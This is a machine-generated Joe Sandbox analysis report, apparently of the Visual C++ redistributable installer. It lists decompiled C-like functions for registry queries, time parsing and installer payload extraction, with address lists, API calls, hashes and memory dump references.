					_t81 = _t79 >> 1;
					_t86 = E00011EDE( &_v8, _t81);
					if(_t86 >= 0) {
						_t71 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _v8,  &_v12);
						_t79 = _v12;
						_t75 = _t71;
						goto L3;
					}
				}
				L23:
				_t48 = _v8;
				if(_v8 != 0) {
					E000554EF(_t48);
				}
				return _t86;
			}




















                                                                          0x000510d8
                                                                          0x000510e0
                                                                          0x000510e2
                                                                          0x000510e8
                                                                          0x000510ea
                                                                          0x000510ed
                                                                          0x000510f3
                                                                          0x000510f6
                                                                          0x000510fa
                                                                          0x00051131
                                                                          0x00051134
                                                                          0x00051140
                                                                          0x00051145
                                                                          0x0005114d
                                                                          0x00051170
                                                                          0x00051174
                                                                          0x00051184
                                                                          0x00051196
                                                                          0x000511a9
                                                                          0x000511b3
                                                                          0x00051230
                                                                          0x000511bc
                                                                          0x000511bc
                                                                          0x000511c0
                                                                          0x000511c2
                                                                          0x000511cb
                                                                          0x000511cf
                                                                          0x000511d2
                                                                          0x000511d5
                                                                          0x000511d7
                                                                          0x000511c2
                                                                          0x000511de
                                                                          0x000511de
                                                                          0x000511e9
                                                                          0x000511f0
                                                                          0x000511f4
                                                                          0x000511f9
                                                                          0x000511fb
                                                                          0x00051200
                                                                          0x00051202
                                                                          0x00051213
                                                                          0x00051217
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00051226
                                                                          0x00051229
                                                                          0x0005122c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005122e
                                                                          0x00000000
                                                                          0x0005122c
                                                                          0x00051202
                                                                          0x00051200
                                                                          0x000511f4
                                                                          0x00051198
                                                                          0x0005119b
                                                                          0x000511a0
                                                                          0x000511a2
                                                                          0x000511a2
                                                                          0x00051186
                                                                          0x00051186
                                                                          0x0005118b
                                                                          0x0005118c
                                                                          0x00000000
                                                                          0x0005118c
                                                                          0x00051176
                                                                          0x00051176
                                                                          0x00051176
                                                                          0x0005114f
                                                                          0x0005114f
                                                                          0x00051151
                                                                          0x00051158
                                                                          0x0005115b
                                                                          0x0005115c
                                                                          0x00051161
                                                                          0x00051161
                                                                          0x00051166
                                                                          0x00051166
                                                                          0x0005114d
                                                                          0x000510fc
                                                                          0x00051101
                                                                          0x0005110a
                                                                          0x0005110e
                                                                          0x00051126
                                                                          0x0005112c
                                                                          0x0005112f
                                                                          0x00000000
                                                                          0x0005112f
                                                                          0x0005110e
                                                                          0x00051235
                                                                          0x00051235
                                                                          0x0005123a
                                                                          0x0005123d
                                                                          0x0005123d
                                                                          0x0005124a

                                                                          APIs
                                                                          • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000510ED
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00026EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00051126
                                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0005121A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$lstrlen
                                                                          • String ID: BundleUpgradeCode$regutil.cpp
                                                                          • API String ID: 3790715954-1648651458
                                                                          • Opcode ID: c9ae826c5a833f7001f2bde779b8d87995bc064dcfe256b5344366cf688e24af
                                                                          • Instruction ID: b2ec601214cd096db9a67ba6340e4362883436c2b3dc1c661b0064fb7b0cfe79
                                                                          • Opcode Fuzzy Hash: c9ae826c5a833f7001f2bde779b8d87995bc064dcfe256b5344366cf688e24af
                                                                          • Instruction Fuzzy Hash: 9B41CD31A0021AABDB258FA8C884BEFB7B9EF44712F1141A9ED15EB210D734DD158BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000585CB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 137timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E000585CB(intOrPtr _a4, struct _FILETIME* _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				signed int _v28;
				struct _FILETIME* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				void* _t26;
				signed short _t32;
				signed int _t35;
				signed short _t38;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t46;
				signed short _t50;
				signed short* _t54;
				void* _t56;
				void* _t57;
				signed short* _t58;
				signed int _t64;
				void* _t65;

				_t21 =  *0x7a008; // 0xfbf51acb
				_v8 = _t21 ^ _t64;
				_v28 = _v28 & 0x00000000;
				_t50 = 0;
				_v32 = _a8;
				_t58 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t26 = E000121A5( &_v28, _a4, 0);
				_t60 = _t26;
				if(_t26 < 0) {
					L23:
					if(_v28 != 0) {
						E000554EF(_v28);
					}
					return E0003DE36(_t50, _v8 ^ _t64, 0, _t58, _t60);
				}
				_t58 = _v28;
				_t54 = _t58;
				if(_t58 == 0) {
					L21:
					if(SystemTimeToFileTime( &_v24, _v32) == 0) {
						_t32 = GetLastError();
						_t63 =  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000;
						_t60 =  >=  ? 0x80004005 :  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "timeutil.cpp", 0xbf,  >=  ? 0x80004005 :  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000);
					}
					goto L23;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t35 =  *_t58 & 0x0000ffff;
					if(_t35 == 0) {
						goto L21;
					}
					_t56 = 0x54;
					if(_t56 == _t35) {
						L6:
						 *_t58 = 0;
						_t58 =  &(_t58[1]);
						_t38 = _t50;
						if(_t38 == 0) {
							_v24.wYear = E00046490(_t54, _t54, 0, 0xa);
							L18:
							_t65 = _t65 + 0xc;
							L19:
							_t54 = _t58;
							_t50 = _t50 + 1;
							L20:
							_t58 =  &(_t58[1]);
							if(_t58 != 0) {
								continue;
							}
							goto L21;
						}
						_t40 = _t38 - 1;
						if(_t40 == 0) {
							_v24.wMonth = E00046490(_t54, _t54, 0, 0xa);
							goto L18;
						}
						_t42 = _t40 - 1;
						if(_t42 == 0) {
							_v24.wDay = E00046490(_t54, _t54, 0, 0xa);
							goto L18;
						}
						_t44 = _t42 - 1;
						if(_t44 == 0) {
							_v24.wHour = E00046490(_t54, _t54, 0, 0xa);
							goto L18;
						}
						_t46 = _t44 - 1;
						if(_t46 == 0) {
							_v24.wMinute = E00046490(_t54, _t54, 0, 0xa);
							goto L18;
						}
						if(_t46 != 1) {
							goto L19;
						}
						_v24.wSecond = E00046490(_t54, _t54, 0, 0xa);
						goto L18;
					}
					_t57 = 0x3a;
					if(_t57 == _t35) {
						goto L6;
					}
					_push(0x2d);
					_pop(0);
					if(0 != _t35) {
						goto L20;
					}
					goto L6;
				}
				goto L21;
			}



























                                                                          0x000585d1
                                                                          0x000585d8
                                                                          0x000585e2
                                                                          0x000585e6
                                                                          0x000585ea
                                                                          0x000585ed
                                                                          0x000585f2
                                                                          0x000585f5
                                                                          0x000585f6
                                                                          0x000585f7
                                                                          0x000585fc
                                                                          0x00058601
                                                                          0x00058605
                                                                          0x00058710
                                                                          0x00058714
                                                                          0x00058719
                                                                          0x00058719
                                                                          0x00058730
                                                                          0x00058730
                                                                          0x0005860b
                                                                          0x0005860e
                                                                          0x00058612
                                                                          0x000586d1
                                                                          0x000586e0
                                                                          0x000586e2
                                                                          0x000586f3
                                                                          0x000586fd
                                                                          0x0005870b
                                                                          0x0005870b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058618
                                                                          0x00058618
                                                                          0x00058618
                                                                          0x0005861e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058626
                                                                          0x0005862a
                                                                          0x00058640
                                                                          0x00058644
                                                                          0x00058649
                                                                          0x0005864c
                                                                          0x0005864e
                                                                          0x000586bd
                                                                          0x000586c1
                                                                          0x000586c1
                                                                          0x000586c4
                                                                          0x000586c4
                                                                          0x000586c6
                                                                          0x000586c7
                                                                          0x000586c8
                                                                          0x000586cb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000586cb
                                                                          0x00058650
                                                                          0x00058653
                                                                          0x000586ae
                                                                          0x00000000
                                                                          0x000586ae
                                                                          0x00058655
                                                                          0x00058658
                                                                          0x0005869f
                                                                          0x00000000
                                                                          0x0005869f
                                                                          0x0005865a
                                                                          0x0005865d
                                                                          0x00058690
                                                                          0x00000000
                                                                          0x00058690
                                                                          0x0005865f
                                                                          0x00058662
                                                                          0x00058681
                                                                          0x00000000
                                                                          0x00058681
                                                                          0x00058667
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058672
                                                                          0x00000000
                                                                          0x00058672
                                                                          0x0005862e
                                                                          0x00058632
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058634
                                                                          0x00058636
                                                                          0x0005863a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005863a
                                                                          0x00000000

                                                                          APIs
                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 000586D8
                                                                          • GetLastError.KERNEL32 ref: 000586E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$ErrorFileLastSystem
                                                                          • String ID: @Met$clbcatq.dll$timeutil.cpp
                                                                          • API String ID: 2781989572-287230135
                                                                          • Opcode ID: d7daf60b14e13af00ac0cadc9304801a321fa36fa802aa568b82a8b616e1772a
                                                                          • Instruction ID: 22ce85afd53bce9837212e2561a1685b720465bb07a9ab48000b1210d3460fe2
                                                                          • Opcode Fuzzy Hash: d7daf60b14e13af00ac0cadc9304801a321fa36fa802aa568b82a8b616e1772a
                                                                          • Instruction Fuzzy Hash: 6241F8B1B4030576EB60ABB88C45BBF77A8EF81702F148529FD01B7191D935CE0883A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003AAE8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E0003AAE8(void* __ebx, signed int __ecx, intOrPtr _a4, intOrPtr* _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v96;
				void* __edi;
				void* _t33;
				void* _t48;
				signed int _t49;
				void* _t51;
				intOrPtr* _t52;
				void* _t53;
				intOrPtr _t54;

				_t49 = __ecx;
				_t47 = __ebx;
				E0003F670(_t51,  &_v96, 0, 0x58);
				_t52 = _a8;
				_v8 = _v8 & 0x00000000;
				_t28 =  ==  ? _t49 | 0xffffffff : _a4;
				_t53 = E0001C129( &_v96, _t52,  ==  ? _t49 | 0xffffffff : _a4, _a12);
				if(_t53 >= 0) {
					_push(__ebx);
					while(1) {
						_t33 = E0001C108( &_v96,  &_v8);
						if(_t33 != 0) {
							break;
						}
						_t48 = 0;
						if(_a20 <= 0) {
							L7:
							_t53 = E0001C344( &_v96);
							if(_t53 < 0) {
								_push( *_t52);
								_push(_v8);
								_push("Failed to skip the extraction of payload: %ls from container: %ls");
								L18:
								_push(_t53);
								E0005012F();
								L11:
								_pop(_t47);
								L12:
								if(_v8 != 0) {
									E000554EF(_v8);
								}
								E0001C055(_t47,  &_v96);
								return _t53;
							}
							continue;
						}
						_t54 = _a16;
						while(CompareStringW(0x7f, 0, _v8, 0xffffffff,  *( *((intOrPtr*)(_t54 + 4)) + 0x38), 0xffffffff) != 2) {
							_t48 = _t48 + 1;
							_t54 = _t54 + 0xc;
							if(_t48 < _a20) {
								continue;
							}
							goto L7;
						}
						_t53 = E0001C386( &_v96,  *((intOrPtr*)(_t54 + 8)));
						if(_t53 >= 0) {
							continue;
						}
						_push( *_t52);
						_push(_v8);
						_push("Failed to extract payload: %ls from container: %ls");
						goto L18;
					}
					_t53 =  !=  ? _t33 : 0;
					if(_t53 < 0) {
						E0005012F(_t53, "Failed to extract all payloads from container: %ls",  *_t52);
					}
					goto L11;
				}
				E0005012F(_t53, "Failed to open container: %ls.",  *_t52);
				goto L12;
			}













                                                                          0x0003aae8
                                                                          0x0003aae8
                                                                          0x0003aaf8
                                                                          0x0003aafd
                                                                          0x0003ab03
                                                                          0x0003ab14
                                                                          0x0003ab22
                                                                          0x0003ab26
                                                                          0x0003ab3a
                                                                          0x0003ab7b
                                                                          0x0003ab83
                                                                          0x0003ab8a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ab3d
                                                                          0x0003ab42
                                                                          0x0003ab6c
                                                                          0x0003ab75
                                                                          0x0003ab79
                                                                          0x0003abea
                                                                          0x0003abec
                                                                          0x0003abef
                                                                          0x0003abf4
                                                                          0x0003abf4
                                                                          0x0003abf5
                                                                          0x0003abaa
                                                                          0x0003abaa
                                                                          0x0003abab
                                                                          0x0003abaf
                                                                          0x0003abb4
                                                                          0x0003abb4
                                                                          0x0003abbd
                                                                          0x0003abc9
                                                                          0x0003abc9
                                                                          0x00000000
                                                                          0x0003ab79
                                                                          0x0003ab44
                                                                          0x0003ab47
                                                                          0x0003ab63
                                                                          0x0003ab64
                                                                          0x0003ab6a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ab6a
                                                                          0x0003abd8
                                                                          0x0003abdc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003abde
                                                                          0x0003abe0
                                                                          0x0003abe3
                                                                          0x00000000
                                                                          0x0003abe3
                                                                          0x0003ab93
                                                                          0x0003ab98
                                                                          0x0003aba2
                                                                          0x0003aba7
                                                                          0x00000000
                                                                          0x0003ab98
                                                                          0x0003ab30
                                                                          0x00000000

                                                                          Strings
                                                                          • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0003ABEF
                                                                          • Failed to open container: %ls., xrefs: 0003AB2A
                                                                          • Failed to extract all payloads from container: %ls, xrefs: 0003AB9C
                                                                          • Failed to extract payload: %ls from container: %ls, xrefs: 0003ABE3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLast
                                                                          • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                          • API String ID: 1214770103-3891707333
                                                                          • Opcode ID: db442f9de795c08840a650ddf1c2a140e52eff65dde03af9ebc00edf6c4bd6b1
                                                                          • Instruction ID: 673e7aaf15fc5536be18b8ab3d363ae2f5c8eed211e6c6ab530e4bc7486f1eda
                                                                          • Opcode Fuzzy Hash: db442f9de795c08840a650ddf1c2a140e52eff65dde03af9ebc00edf6c4bd6b1
                                                                          • Instruction Fuzzy Hash: E831F636E4061AFBCF129AE4CC42EDEB76EAF05310F100225FD11AA192E731DA55DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054212 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00054212(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _t34;
				void* _t37;
				signed short* _t39;
				signed int _t42;
				void* _t44;
				void* _t45;
				signed int _t49;
				void* _t50;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_t50 = E00054315(_a4, _a8);
				if(_t50 == 0) {
					L21:
					if(_v12 != 0) {
						E00012647(_v12, _v8);
					}
					if(_v16 != 0) {
						RegCloseKey(_v16);
					}
					return _t50;
				}
				_t34 = E00050E3F(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 1,  &_v16);
				if(_t34 == 0x80070002 || _t34 < 0) {
					L20:
					goto L21;
				} else {
					_t37 = E000510C5(_v16, L"PendingFileRenameOperations",  &_v12,  &_v8);
					if(_t37 != 0x80070002 && _t37 >= 0) {
						_t49 = 0;
						if(_v8 <= 0) {
							goto L20;
						}
						_a8 = 0x5c;
						_t45 = 0x3f;
						do {
							_t39 =  *(_v12 + _t49 * 4);
							if(_t39 == 0) {
								goto L17;
							}
							_t42 =  *_t39 & 0x0000ffff;
							if(_t42 == 0) {
								goto L17;
							}
							if(_a8 == _t42 && _t45 == _t39[1] && _t45 == _t39[2]) {
								_t44 = 0x5c;
								if(_t44 == _t39[3]) {
									_t39 =  &(_t39[4]);
								}
							}
							if(E00012D05( &_v20, _a4, _t39,  &_v20) < 0) {
								goto L20;
							} else {
								if(_v20 == 2) {
									_t50 = 0;
									goto L20;
								}
								_t45 = 0x3f;
							}
							L17:
							_t49 = _t49 + 2;
						} while (_t49 < _v8);
					}
					goto L20;
				}
			}















                                                                          0x00054222
                                                                          0x00054225
                                                                          0x00054228
                                                                          0x0005422b
                                                                          0x00054233
                                                                          0x00054237
                                                                          0x000542ed
                                                                          0x000542f0
                                                                          0x000542f8
                                                                          0x000542f8
                                                                          0x00054300
                                                                          0x00054305
                                                                          0x00054305
                                                                          0x00054312
                                                                          0x00054312
                                                                          0x0005424e
                                                                          0x0005425a
                                                                          0x000542ec
                                                                          0x00000000
                                                                          0x00054268
                                                                          0x00054278
                                                                          0x0005427f
                                                                          0x00054285
                                                                          0x0005428a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005428e
                                                                          0x00054295
                                                                          0x00054296
                                                                          0x00054299
                                                                          0x0005429e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000542a0
                                                                          0x000542a6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000542ac
                                                                          0x000542bc
                                                                          0x000542c1
                                                                          0x000542c3
                                                                          0x000542c3
                                                                          0x000542c1
                                                                          0x000542d5
                                                                          0x00000000
                                                                          0x000542d7
                                                                          0x000542db
                                                                          0x000542ea
                                                                          0x00000000
                                                                          0x000542ea
                                                                          0x000542df
                                                                          0x000542df
                                                                          0x000542e0
                                                                          0x000542e0
                                                                          0x000542e3
                                                                          0x000542e8
                                                                          0x00000000
                                                                          0x0005427f

                                                                          APIs
                                                                            • Part of subcall function 00054315: FindFirstFileW.KERNEL32(00038FFA,?,000002C0,00000000,00000000), ref: 00054350
                                                                            • Part of subcall function 00054315: FindClose.KERNEL32(00000000), ref: 0005435C
                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 00054305
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                            • Part of subcall function 000510C5: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000510ED
                                                                            • Part of subcall function 000510C5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00026EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00051126
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFindQueryValue$FileFirstOpen
                                                                          • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                          • API String ID: 3397690329-3978359083
                                                                          • Opcode ID: 17fee2e058f2005369d91d56582188f87b339f63b87ebf38712cf8c13cc09815
                                                                          • Instruction ID: 275331c51fcb3fa0fe9c97e89974d2be90b1f54727ce246af3abba60e192fa06
                                                                          • Opcode Fuzzy Hash: 17fee2e058f2005369d91d56582188f87b339f63b87ebf38712cf8c13cc09815
                                                                          • Instruction Fuzzy Hash: EF319E35900229BADF21AFD1C881AFFB7B9EB0035AF94816AFD04A7151D7319AD8CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001EEF9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E0001EEF9(void* __ecx, intOrPtr _a4) {
				void* _v8;
				short* _v12;
				char _v16;
				void* _t25;
				intOrPtr _t44;
				void* _t45;
				intOrPtr _t46;

				_t41 = __ecx;
				_v16 = 0;
				_t40 = 1;
				_v12 = 0;
				_v8 = 0;
				_t25 = E0001E7CD(__ecx, _a4,  &_v16);
				_t44 = _v16;
				_t45 = _t25;
				if(_t45 >= 0) {
					_t46 = _a4;
					if(E00050E3F( *((intOrPtr*)(_t46 + 0x4c)), _t44, 1,  &_v8) < 0) {
						L7:
						_t45 = 0;
						if(_t40 != 0) {
							_t45 = E00050B49(_t41,  *((intOrPtr*)(_a4 + 0x4c)), _t44, 0, 0);
							if(_t45 != 0x80070002 && _t45 < 0) {
								E0005012F(_t45, "Failed to remove update registration key: %ls", _t44);
							}
						}
						goto L11;
					}
					if(E00050F6E(_v8, L"PackageVersion",  &_v12) >= 0) {
						CompareStringW(0x7f, 0, _v12, 0xffffffff,  *(_t46 + 0x64), 0xffffffff);
						_t41 = 0;
						_t40 =  !=  ? 0 : 1;
					}
					if(_v8 != 0) {
						RegCloseKey(_v8);
						_v8 = _v8 & 0x00000000;
					}
					goto L7;
				} else {
					_push("Failed to format key for update registration.");
					_push(_t45);
					E0005012F();
					L11:
					if(_v12 != 0) {
						E000554EF(_v12);
					}
					if(_t44 != 0) {
						E000554EF(_t44);
					}
					return _t45;
				}
			}










                                                                          0x0001eef9
                                                                          0x0001ef05
                                                                          0x0001ef08
                                                                          0x0001ef09
                                                                          0x0001ef0c
                                                                          0x0001ef18
                                                                          0x0001ef1d
                                                                          0x0001ef20
                                                                          0x0001ef24
                                                                          0x0001ef38
                                                                          0x0001ef4b
                                                                          0x0001ef91
                                                                          0x0001ef91
                                                                          0x0001ef95
                                                                          0x0001efa5
                                                                          0x0001efad
                                                                          0x0001efba
                                                                          0x0001efbf
                                                                          0x0001efad
                                                                          0x00000000
                                                                          0x0001ef95
                                                                          0x0001ef60
                                                                          0x0001ef70
                                                                          0x0001ef76
                                                                          0x0001ef7b
                                                                          0x0001ef7b
                                                                          0x0001ef82
                                                                          0x0001ef87
                                                                          0x0001ef8d
                                                                          0x0001ef8d
                                                                          0x00000000
                                                                          0x0001ef26
                                                                          0x0001ef26
                                                                          0x0001ef2b
                                                                          0x0001ef2c
                                                                          0x0001efc2
                                                                          0x0001efc6
                                                                          0x0001efcb
                                                                          0x0001efcb
                                                                          0x0001efd2
                                                                          0x0001efd5
                                                                          0x0001efd5
                                                                          0x0001efe2
                                                                          0x0001efe2

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,000204CB,00000001,00000001,00000001,000204CB,00000000), ref: 0001EF70
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,000204CB,00000001,00000001,00000001,000204CB,00000000,00000001,00000002,000204CB,00000001), ref: 0001EF87
                                                                          Strings
                                                                          • Failed to remove update registration key: %ls, xrefs: 0001EFB4
                                                                          • PackageVersion, xrefs: 0001EF51
                                                                          • Failed to format key for update registration., xrefs: 0001EF26
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCompareString
                                                                          • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                          • API String ID: 446873843-3222553582
                                                                          • Opcode ID: bf4c881f876450f078beb82fe854a1452e5bf8b839e09b2677275e58d198383d
                                                                          • Instruction ID: 9a6d13ad927e8acb9cbdb68c25799c0e2112a14ffca3f3051d57cf6398502557
                                                                          • Opcode Fuzzy Hash: bf4c881f876450f078beb82fe854a1452e5bf8b839e09b2677275e58d198383d
                                                                          • Instruction Fuzzy Hash: 4621E136A04658BBDB21AAA5CC46EDFBBB9EF00712F204179FD04A7191D7319E85C690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001EE0F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E0001EE0F(intOrPtr _a4, void* _a8) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _v20;
				char _t28;
				intOrPtr* _t43;
				char _t49;
				char _t50;

				_t43 = _a8;
				_t50 = 0;
				_v16 = 0;
				_t49 = 0;
				_v8 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(_t43 + 4)) <= 0) {
					L17:
					return _t50;
				}
				_t28 = 0;
				_a8 = 0;
				while(1) {
					_t45 =  *_t43 + _t28;
					_v20 =  *_t43 + _t28;
					_t50 = E000171CF(_a4,  *((intOrPtr*)(_t45 + 8)),  &_v16, 0);
					if(_t50 < 0) {
						break;
					}
					_t50 = E00012D79(_t45, _v16, L"swidtag",  &_v8);
					if(_t50 < 0) {
						_push("Failed to allocate regid folder path.");
						L10:
						_push(_t50);
						E0005012F();
						L11:
						if(_v12 != 0) {
							E000554EF(_v12);
						}
						if(_v8 != 0) {
							E000554EF(_v8);
						}
						if(_v16 != 0) {
							E000554EF(_v16);
						}
						goto L17;
					}
					_t50 = E00012D79(_t45, _v8,  *_v20,  &_v12);
					_t54 = _t50;
					if(_t50 < 0) {
						_push("Failed to allocate regid file path.");
						goto L10;
					}
					E00054038(_t45, _t54, _v12);
					_push(0);
					E00013B6A(_t45, _v8);
					_t49 = _t49 + 1;
					_t28 = _a8 + 0x10;
					_push(0);
					_a8 = _t28;
					_pop(0);
					if(_t49 <  *((intOrPtr*)(_t43 + 4))) {
						continue;
					}
					goto L11;
				}
				_push("Failed to format tag folder path.");
				goto L10;
			}











                                                                          0x0001ee16
                                                                          0x0001ee1d
                                                                          0x0001ee1f
                                                                          0x0001ee22
                                                                          0x0001ee24
                                                                          0x0001ee27
                                                                          0x0001ee2d
                                                                          0x0001eeef
                                                                          0x0001eef6
                                                                          0x0001eef6
                                                                          0x0001ee33
                                                                          0x0001ee35
                                                                          0x0001ee38
                                                                          0x0001ee3a
                                                                          0x0001ee41
                                                                          0x0001ee4f
                                                                          0x0001ee53
